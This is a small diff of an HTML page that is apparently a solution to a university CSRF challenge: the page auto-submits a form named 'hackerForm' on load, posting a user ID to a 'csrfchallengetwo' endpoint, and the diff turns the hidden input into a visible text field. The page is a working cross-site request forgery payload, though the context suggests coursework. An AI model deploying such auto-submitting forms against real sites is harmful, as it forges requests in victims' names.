--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
 <body onload="submitForm()">
   <img src="http://klockren.se/klockren.png" style="width: 500px;" />
   <form name="hackerForm" action="https://snickerboa.it.liu.se/user/csrfchallengetwo/plusplus" method="POST">
-    <input type="hidden" name="userId" value="87d0d107b1521d76bb260cc345c13bf90f6f4cd6" />
+    <input type="text" name="userId" value="87d0d107b1521d76bb260cc345c13bf90f6f4cd6" />
     <input type="submit"/>
   </form>
 <script> 
